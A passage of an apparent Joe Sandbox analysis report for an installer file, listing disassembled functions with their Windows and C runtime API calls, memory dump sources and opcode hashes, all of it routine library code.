                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$CursorEnterLoad
                                                                                                                        • String ID: v$ATL:%p
                                                                                                                        • API String ID: 2080323225-109518622
                                                                                                                        • Opcode ID: 8c95e99d50a1eb6963bcecc4a17cf5f617d8136f2bdccb6aa017764d8510e86f
                                                                                                                        • Instruction ID: 887ed40e34ff0ed3e402c9d7584be7cc8ce7f0504d8e93acec24c9b4055f8246
                                                                                                                        • Opcode Fuzzy Hash: 8c95e99d50a1eb6963bcecc4a17cf5f617d8136f2bdccb6aa017764d8510e86f
                                                                                                                        • Instruction Fuzzy Hash: 4451DE71D00B45DBDB21CF68C9056AAB7F4FF18711F10462EEC96A3690EB70B985CB50
                                                                                                                        Function 00A2F992 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00A2FA9F,?,?,?,00000000,00000000,?,00A2FD09,00000021,FlsSetValue,00AA3E7C,00AA3E84,?), ref: 00A2FA53
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                        • Opcode ID: 2bed11af0b174c95690811486275c1b67d7aba3ed6897125aedf16d9ffd02711
                                                                                                                        • Instruction ID: 8079e81721f1855ef49e5e4096ec3ec0fa0f120b8a2e550001844cdef692c8b8
                                                                                                                        • Opcode Fuzzy Hash: 2bed11af0b174c95690811486275c1b67d7aba3ed6897125aedf16d9ffd02711
                                                                                                                        • Instruction Fuzzy Hash: 5A21D572A01124AFCB21DB69BC51A5B3778AB517A0F260171FE0AE72D1EB30ED01C6D0
                                                                                                                        Function 00A13100 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00A1317B,00A130DE,00A1337F), ref: 00A13117
                                                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A1312D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A13142
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                        • API String ID: 667068680-1718035505
                                                                                                                        • Opcode ID: caeb88b55bf037a409aa96fcffda862d37b6f1771f158d578862517b90beb781
                                                                                                                        • Instruction ID: 6ea3057c06f9fdae3f28e0969921f6823717383a4a8f8371275616535ea2cd8f
                                                                                                                        • Opcode Fuzzy Hash: caeb88b55bf037a409aa96fcffda862d37b6f1771f158d578862517b90beb781
                                                                                                                        • Instruction Fuzzy Hash: 89F0C237B022227F4F314FA55C81AF723FC5B017A43290A3AD902D3210EA90CEC296D0
                                                                                                                        Function 0087EA00 Relevance: 9.2, APIs: 6, Instructions: 153COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0087EA4A
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0087EA6C
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0087EA94
                                                                                                                        • __Getctype.LIBCPMT ref: 0087EB75
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0087EBD7
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0087EC01
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1102183713-0
                                                                                                                        • Opcode ID: f6405f4b31fa32293bb1cc1c50f1510192a4d862a5438165219a0647d9ca0793
                                                                                                                        • Instruction ID: ed3c7036e718c66b9551b279334033082c4af0018734fe9b811dbb744388521b
                                                                                                                        • Opcode Fuzzy Hash: f6405f4b31fa32293bb1cc1c50f1510192a4d862a5438165219a0647d9ca0793
                                                                                                                        • Instruction Fuzzy Hash: 3561A0B1D00259CFDB10CF58C5457AEFBF4FF18314F1482A9D855AB291EB74AA84CB91
                                                                                                                        Function 0087E800 Relevance: 9.1, APIs: 6, Instructions: 140COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0087E83D
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0087E85F
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0087E887
                                                                                                                        • __Getcoll.LIBCPMT ref: 0087E951
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0087E996
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0087E9CE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1184649410-0
                                                                                                                        • Opcode ID: d284e06c4f820a9300e5c43f01307d3d45d6e15a25bef6f1d06a38d26c79f51a
                                                                                                                        • Instruction ID: ce6a333031d58c810325de233e303aa6c3263a301773e4e416e28144bb5e17a5
                                                                                                                        • Opcode Fuzzy Hash: d284e06c4f820a9300e5c43f01307d3d45d6e15a25bef6f1d06a38d26c79f51a
                                                                                                                        • Instruction Fuzzy Hash: CC517E71D01208EFDF01DF98E984B9DBBB4FF48314F2481A9E815AB391DB749A05CB92
                                                                                                                        Function 00A17A13 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,00A17A0A,00A179D6,?,?,0087BBBD,0095F350,?,00000008), ref: 00A17A21
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A17A2F
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A17A48
                                                                                                                        • SetLastError.KERNEL32(00000000,00A17A0A,00A179D6,?,?,0087BBBD,0095F350,?,00000008), ref: 00A17A9A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3852720340-0
                                                                                                                        • Opcode ID: 22b32c87bed72333953d556367edb262f57dc33d7dd6295b760b4add52def709
                                                                                                                        • Instruction ID: c8ac9a98b27168c47ae6604e6820a4cfefb569b96429382056f8a2a4d83f0cc7
                                                                                                                        • Opcode Fuzzy Hash: 22b32c87bed72333953d556367edb262f57dc33d7dd6295b760b4add52def709
                                                                                                                        • Instruction Fuzzy Hash: D401FC3220E316AEA73527B8BD859EF2B69DF113B8720123AF514960E1FF154DD151C0
                                                                                                                        Function 009A54D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 244fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 009A5504
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 009A55AA
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 009A5619
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?), ref: 009A56DF
                                                                                                                          • Part of subcall function 00964070: LoadStringW.USER32(000000A1,?,00000514,C7BA013E), ref: 00963FD6
                                                                                                                        Strings
                                                                                                                        • --verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 009A555E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFileInit_thread_footer_wcsrchr$HeapLoadProcessString
                                                                                                                        • String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
                                                                                                                        • API String ID: 2702461799-3685554107
                                                                                                                        • Opcode ID: 995307ad121f24f2bda780d61f3b1dd630a8c9e35cad2f784fee9fd5acfe5262
                                                                                                                        • Instruction ID: 5c92fb3709678f32b730483643ee36217be15efa294c4c09c156ba9fe4d42ebc
                                                                                                                        • Opcode Fuzzy Hash: 995307ad121f24f2bda780d61f3b1dd630a8c9e35cad2f784fee9fd5acfe5262
                                                                                                                        • Instruction Fuzzy Hash: 7891B271A00909DFDB00DB6CC844B9EBBB9FF45324F1582A9E815DB2A2DB35DD04CB91
                                                                                                                        Function 008496F0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 230COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 008497D5
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00849820
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer
                                                                                                                        • String ID: </a>$<a href="$<a>
                                                                                                                        • API String ID: 1385522511-4210067781
                                                                                                                        • Opcode ID: 3c616a07ddf978199d898361107ea6e4bea02f21bf5630a34d0539022c0fdcdd
                                                                                                                        • Instruction ID: 0db7599f06e370c9cebf75722b46d90c0e4155cd9d8075da89f13b22ea4d236b
                                                                                                                        • Opcode Fuzzy Hash: 3c616a07ddf978199d898361107ea6e4bea02f21bf5630a34d0539022c0fdcdd
                                                                                                                        • Instruction Fuzzy Hash: DD917070A00708EFCB14DF68D945BAEB7B1FF49314F208669E425EB2D1EB70A945CB91
                                                                                                                        Function 008770C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 182windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,SysTabControl32,?,46010000,?,?,?,?,00000000,00000309,00000000), ref: 008771BD
                                                                                                                        • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 008771D2
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 008771DA
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                          • Part of subcall function 00878E00: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00878E4C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$AllocateCreateHeapWindow
                                                                                                                        • String ID: SysTabControl32$TabHost
                                                                                                                        • API String ID: 2359350451-2872506973
                                                                                                                        • Opcode ID: dd77a43d9177b9b7b072badbade9f4e18da097ee62c04e55a7a5dc3c543b92f1
                                                                                                                        • Instruction ID: 1c78dece5083dbb68918443acd68465d523c60e820bd9e2183db893f599138a4
                                                                                                                        • Opcode Fuzzy Hash: dd77a43d9177b9b7b072badbade9f4e18da097ee62c04e55a7a5dc3c543b92f1
                                                                                                                        • Instruction Fuzzy Hash: AE518C35A00605AFDB14DF68C844BAEBBB5FF49310F104669E819EB391DB74A901CBA1
                                                                                                                        Function 00863DE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(C7BA013E,C7BA013E,?), ref: 00863E1F
                                                                                                                        • EnterCriticalSection.KERNEL32(?,C7BA013E,?), ref: 00863E2C
                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00863E74
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?), ref: 00863F03
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInitializeKillLeaveTimer
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 3614119372-3261393531
                                                                                                                        • Opcode ID: 8de91a3a9cbd7bcc1daf4076a06ccc278486afc4dda1beef483f29e5c1bf877c
                                                                                                                        • Instruction ID: 9138a54f8b877cb4d91c6e5c88886b5f651e37a4c2eba7a9714f397de4819d85
                                                                                                                        • Opcode Fuzzy Hash: 8de91a3a9cbd7bcc1daf4076a06ccc278486afc4dda1beef483f29e5c1bf877c
                                                                                                                        • Instruction Fuzzy Hash: 6D4113347007458FCB22CF38C840BAABBB5FF45314F100569E4A6D7792CB32AA16CBA0
                                                                                                                        Function 0094B6C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96registrylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(Advapi32.dll,C7BA013E,00000000,?,?,?,00000000,Function_001FE310,000000FF), ref: 0094B703
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 0094B72C
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,Function_001FE310,000000FF), ref: 0094B78C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                                                        • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                                        • API String ID: 4190037839-2994018265
                                                                                                                        • Opcode ID: 6c25ec83ed3c9be18483c5c1107dba98647e694b6156d29ae84ad1ca92a607d9
                                                                                                                        • Instruction ID: 948fae53ecf9560e1187fa9ac87b6e686e02169c052dbea63f959759523e9c4a
                                                                                                                        • Opcode Fuzzy Hash: 6c25ec83ed3c9be18483c5c1107dba98647e694b6156d29ae84ad1ca92a607d9
                                                                                                                        • Instruction Fuzzy Hash: 11317F76644205EFEB248F45DC45FAABBACFB48750F10452AF905DB680E775E810CA94
                                                                                                                        Function 00A215AC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C7BA013E,?,?,00000000,00A9D7B9,000000FF,?,00A2153C,?,?,00A21510,?), ref: 00A215E1
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A215F3
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00A9D7B9,000000FF,?,00A2153C,?,?,00A21510,?), ref: 00A21615
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 8b0cddaeef1ea7d29c915f4800575e3831f096d3a3e50198dafa693ee9b651ac
                                                                                                                        • Instruction ID: 6b2b571c10d88f671cde116e134efb5cc64823dff02122842deea1dc078af4a9
                                                                                                                        • Opcode Fuzzy Hash: 8b0cddaeef1ea7d29c915f4800575e3831f096d3a3e50198dafa693ee9b651ac
                                                                                                                        • Instruction Fuzzy Hash: 7A01A279A44669FFCB118F94DC05BAEBBB8FB04B11F040636E811E26D0DB749900CA84
                                                                                                                        Function 00A1632A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SleepConditionVariableCS.KERNELBASE(?,00A162C7,00000064), ref: 00A1634D
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,00A162C7,00000064,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF), ref: 00A16357
                                                                                                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00A162C7,00000064,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF), ref: 00A16368
                                                                                                                        • EnterCriticalSection.KERNEL32(00B2FE4C,?,00A162C7,00000064,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A1636F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 3269011525-3261393531
